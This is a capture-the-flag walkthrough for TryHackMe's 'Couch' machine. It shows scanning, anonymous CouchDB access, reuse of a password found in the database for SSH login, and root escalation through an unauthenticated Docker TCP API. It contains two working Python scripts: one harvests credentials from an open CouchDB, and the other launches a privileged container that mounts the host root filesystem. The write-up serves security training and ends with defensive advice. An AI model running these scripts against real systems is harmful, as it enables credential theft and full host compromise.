TryHackMe: Couch by stuxnet

Scan the machine. How many ports are open?

Ok, first things first: add the target to /etc/hosts (as couch) and run rustscan to see what we have.

╰─⠠⠵ rustscan -a couch --ulimit 10000 -- -sC -sV -oA couch -v
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/tj/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.92.201:22
Open 10.10.92.201:5984
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 20:37 BST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
Initiating Ping Scan at 20:37
Scanning 10.10.92.201 [2 ports]
Completed Ping Scan at 20:37, 0.03s elapsed (1 total hosts)
Initiating Connect Scan at 20:37
Scanning couch (10.10.92.201) [2 ports]
Discovered open port 22/tcp on 10.10.92.201
Discovered open port 5984/tcp on 10.10.92.201
Completed Connect Scan at 20:37, 0.03s elapsed (2 total ports)
Initiating Service scan at 20:37
Scanning 2 services on couch (10.10.92.201)
Completed Service scan at 20:37, 11.15s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.92.201.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 1.33s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.14s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
Nmap scan report for couch (10.10.92.201)
Host is up, received conn-refused (0.034s latency).
Scanned at 2021-07-09 20:37:33 BST for 12s

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 34:9d:39:09:34:30:4b:3d:a7:1e:df:eb:a3:b0:e5:aa (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDMXnGZUnLWqLZb8VQiVH0z85lV+G4KY5l5kKf1fS7YgSnfZ+k3CRjAZPuGceg5RQEUbOMCm+0u4SDyIEbwwAXGv0ORK4/VEIyJlZmtlqeyASwR8ML4yjdGqinqOUZ3jN/ZIg4veJ02nr86GZP+Nto0TZt7beaIxykMEZHTdo0CctdKLIet7PpvwG4F5Tn9MBoys9pUjfpcnwbf91Tv6i56Gipo07jKgb5vP8Nl1TXPjWB93WNW2vWEQ1J4tiyZlBeLOaNaEbxvNQFnKxjVYiiLCbcofwSdrwZ7/+sIy5BdiNW+k81rBN3OqaQNZ8urFaiXXf/ukRr/hhjY5a6m0MHn
|   256 a4:2e:ef:3a:84:5d:21:1b:b9:d4:26:13:a5:2d:df:19 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNTR07g3p8MfnQVnv8uqj8GGDH6VoSRzwRFflMbEf3WspsYyVipg6vtNQMaq5uNGUXF8ubpsnHeJA+T3RilTLXc=
|   256 e1:6d:4d:fd:c8:00:8e:86:c2:13:2d:c7:ad:85:13:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKLUyz2Tpwc5qPuFxV+HnGBeqLC6NWrmpmGmE0hk7Hlj
5984/tcp open  http    syn-ack CouchDB httpd 1.6.1 (Erlang OTP/18)
|_http-favicon: Unknown favicon MD5: 2AB2AAE806E8393B70970B2EAACE82E0
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: CouchDB/1.6.1 (Erlang OTP/18)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:37
Completed NSE at 20:37, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.17 seconds

Answer: 2

What is the database management system installed on the server?

From our nmap scan we can see that the service on 5984/tcp is CouchDB:

5984/tcp open  http    syn-ack CouchDB httpd 1.6.1 (Erlang OTP/18)

Answer: CouchDB

What port is the database management system running on?

Again, the port is right there in the scan output.

Answer: 5984

What is the version of the management system installed on the server?

Again, the version comes straight from the service banner in the scan.

Answer: 1.6.1

What is the path for the web administration tool for this database management system?

A quick search (or the CouchDB 1.x documentation) reveals the URL: the Futon web admin interface is served at /_utils, so http://couch:5984/_utils opens it.

Answer: _utils

What is the path to list all databases in the web browser of the database management system?

CouchDB returns the list of database names as a JSON array from /_all_dbs, so browsing to http://couch:5984/_all_dbs shows every database. Note that none of this needs a login: with no server admin configured, CouchDB runs in what it calls "admin party" mode and grants anonymous requests full access.

Answer: _all_dbs

What are the credentials found in the web administration tool?

Looking at the secrets database in Futon, we see a document containing a username and password.

Answer: ***********:***********
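The same enumeration (list databases, pull every document, look for password-like fields) can be scripted against the REST API instead of clicking through Futon. The script below is an added example for this writeup, not code from the room or the CouchDB project. It assumes the target resolves as couch on port 5984 (the /etc/hosts entry used above) and still answers anonymously; the SAMPLE_ALL_DOCS response is constructed so the parsing logic can be exercised offline.

```python
"""Enumerate an unauthenticated CouchDB 1.x instance and flag credential-like fields.

Added example for this writeup, not code from the room or the CouchDB project.
Assumptions: the target is reachable at BASE_URL (the room host used above) and
no server admin is configured, so anonymous GET requests are permitted.
"""
import json
import urllib.request
from urllib.parse import quote

BASE_URL = "http://couch:5984"  # assumption: matches the /etc/hosts entry used above

# Document keys that usually hold secrets; tuned for quick triage, not exhaustive.
SECRET_KEYS = ("password", "passwd", "pass", "secret", "token", "api_key", "apikey")


def get_json(url, timeout=5):
    """GET a URL and decode the JSON body; CouchDB answers every endpoint in JSON."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return json.loads(resp.read().decode("utf-8"))


def list_databases(base_url=BASE_URL):
    """/_all_dbs returns a JSON array of database names."""
    return get_json(f"{base_url}/_all_dbs")


def fetch_documents(db, base_url=BASE_URL):
    """/<db>/_all_docs?include_docs=true returns every document inline."""
    body = get_json(f"{base_url}/{quote(db, safe='')}/_all_docs?include_docs=true")
    return extract_documents(body)


def extract_documents(all_docs_body):
    """Pull the inline 'doc' objects out of an _all_docs response, skipping design docs."""
    docs = []
    for row in all_docs_body.get("rows", []):
        doc = row.get("doc")
        if doc and not doc.get("_id", "").startswith("_design/"):
            docs.append(doc)
    return docs


def find_credentials(docs):
    """Return (doc_id, key, value) for every top-level string field whose name looks like a secret."""
    hits = []
    for doc in docs:
        for key, value in doc.items():
            if key.lower() in SECRET_KEYS and isinstance(value, str):
                hits.append((doc.get("_id", "?"), key, value))
    return hits


# Constructed sample response, shaped like CouchDB's _all_docs output, so the
# parsing logic can be exercised without a live server. Values are placeholders.
SAMPLE_ALL_DOCS = {
    "total_rows": 2,
    "offset": 0,
    "rows": [
        {"id": "_design/app", "key": "_design/app", "value": {"rev": "1-a"},
         "doc": {"_id": "_design/app", "_rev": "1-a", "views": {}}},
        {"id": "login", "key": "login", "value": {"rev": "1-b"},
         "doc": {"_id": "login", "_rev": "1-b", "username": "example", "password": "hunter2"}},
    ],
}


def main():
    """Walk every database on the target and print credential-like fields."""
    for db in list_databases():
        for doc_id, key, value in find_credentials(fetch_documents(db)):
            print(f"{db}/{doc_id}: {key} = {value}")


if __name__ == "__main__":
    main()
```

Design documents (_design/...) are skipped because they hold views, not data. On a real engagement extend SECRET_KEYS and recurse into nested objects; the flat scan here is enough for the room's single-document secrets database.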

Compromise the machine and locate user.txt

Attempting to log in over SSH with those credentials works: the database password has been reused for the local account. From there we can cat the flag file user.txt.

atena@ubuntu:~$ cat user.txt 
THM{***********}

Answer: THM{***********}

Escalate privileges and obtain root.txt

Let's see if we can own the box. First up is sudo -l:

atena@ubuntu:~$ sudo -l
[sudo] password for atena: 
Sorry, user atena may not run sudo on ubuntu.

No luck. Let's see what groups we are in:

atena@ubuntu:~$ id
uid=1000(atena) gid=1000(atena) groups=1000(atena),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)

OK, adm might help (it typically grants read access to the logs under /var/log), but in the meantime let's copy over linpeas.sh and see if we spot anything interesting.

╔══════════╣ Useful software                                                                                                 
/usr/bin/docker  

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports                                                     
tcp        0      0 0.0.0.0:5984            0.0.0.0:*               LISTEN      -                                            
tcp        0      0 127.0.0.1:2375          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:32986         0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::22                   :::*   

-rwsr-xr-x 1 root root       134K Jan 31  2020 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable

/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep

Digging around the output I can not see much at first, but two things line up: docker is installed, and something is listening on 127.0.0.1:2375, which is the conventional port for the Docker daemon's plain-HTTP API (2376 is the TLS variant). Looking at .bash_history confirms it; there is a docker command that talks to exactly that port:

  166  docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

Using this we can ask the daemon to start a fresh Alpine container with the host's root filesystem bind-mounted at /mnt. The daemon runs as root and nothing on the TCP listener authenticates us, so we are root inside the container and can read /mnt/root and get our flag. The -v /:/mnt mount alone is enough for that; --privileged and --net=host additionally hand over all capabilities and the host network namespace, so a chroot /mnt from inside the container would give a full root shell on the host.

atena@ubuntu:~$ docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
/ # ls /mnt/
bin/            home/           lib64/          opt/            sbin/           usr/
boot/           initrd.img      lost+found/     proc/           srv/            var/
dev/            initrd.img.old  media/          root/           sys/            vmlinuz
etc/            lib/            mnt/            run/            tmp/            vmlinuz.old
/ # cat /mnt/root/root.txt 
THM{***********}
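To make clear what the docker CLI is doing over that port, the script below drives the Docker Engine REST API directly and reproduces the run command from .bash_history: create a container with the host root bound at /mnt, start it, wait for it, and read its output. This is an added example for this writeup, not code from the room or from Docker. It assumes the daemon is the plain-HTTP listener on 127.0.0.1:2375 that linpeas showed, that the alpine image is already present on the host (the writeup's command pulled it successfully), and it names its own helpers (build_create_payload, demux_stream, run_on_host). SAMPLE_STREAM is a constructed log stream for exercising the frame parser offline.

```python
"""Talk to an exposed Docker Engine TCP API directly, the way `docker -H` does.

Added example for this writeup, not code from the room or from Docker.
Assumptions: the daemon listens on 127.0.0.1:2375 without TLS or client
authentication, the alpine image is already present, and the endpoints used
here (stable in the Engine API for years) are accepted by the daemon's version.
"""
import json
import urllib.request

DOCKER_API = "http://127.0.0.1:2375"  # assumption: the plain-HTTP listener from linpeas


def build_create_payload(cmd, image="alpine"):
    """Body for POST /containers/create equivalent to
    `docker run --privileged --net=host -v /:/mnt <image> <cmd>`.

    Binds mounts the host root at /mnt; Privileged keeps every capability and
    device; NetworkMode host shares the host network namespace. The bind mount
    alone already exposes every file on the host to whoever can reach the API.
    """
    return {
        "Image": image,
        "Cmd": list(cmd),
        "Tty": False,
        "HostConfig": {
            "Binds": ["/:/mnt"],
            "Privileged": True,
            "NetworkMode": "host",
        },
    }


def demux_stream(raw):
    """Split Docker's multiplexed log stream into (stdout, stderr).

    Without a TTY each frame carries an 8-byte header: stream type
    (1 = stdout, 2 = stderr), three zero bytes, then a big-endian uint32
    payload length. A truncated trailing frame is dropped rather than guessed.
    """
    out, err = bytearray(), bytearray()
    pos = 0
    while pos + 8 <= len(raw):
        stream_type = raw[pos]
        length = int.from_bytes(raw[pos + 4:pos + 8], "big")
        payload = raw[pos + 8:pos + 8 + length]
        (out if stream_type == 1 else err).extend(payload)
        pos += 8 + length
    return bytes(out), bytes(err)


def api(method, path, body=None):
    """Minimal HTTP helper for the Engine API; returns (status, raw body)."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(DOCKER_API + path, data=data, method=method)
    if data is not None:
        req.add_header("Content-Type", "application/json")
    with urllib.request.urlopen(req, timeout=60) as resp:
        return resp.status, resp.read()


def run_on_host(cmd):
    """Create, start, wait for and collect output from a privileged container running cmd.

    The container is force-removed afterwards, mirroring the --rm in the history line.
    """
    _, created = api("POST", "/containers/create", build_create_payload(cmd))
    cid = json.loads(created)["Id"]
    try:
        api("POST", f"/containers/{cid}/start")   # 204 No Content on success
        api("POST", f"/containers/{cid}/wait")    # blocks until the command exits
        _, raw = api("GET", f"/containers/{cid}/logs?stdout=1&stderr=1")
        return demux_stream(raw)
    finally:
        api("DELETE", f"/containers/{cid}?force=1")


# Constructed multiplexed stream: one stdout frame ("hello\n") and one stderr frame ("oops").
SAMPLE_STREAM = (
    b"\x01\x00\x00\x00" + (6).to_bytes(4, "big") + b"hello\n"
    + b"\x02\x00\x00\x00" + (4).to_bytes(4, "big") + b"oops"
)

if __name__ == "__main__":
    stdout, stderr = run_on_host(["cat", "/mnt/root/root.txt"])
    print(stdout.decode(), end="")
```

The fix on the defensive side is not a CouchDB patch but the daemon's socket configuration: keep dockerd on the unix socket (and treat membership of the docker group as root), or if TCP is unavoidable, use 2376 with TLS and client certificate verification. Anything that can speak to an unauthenticated Engine API is root on the host.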

Answer: THM{***********}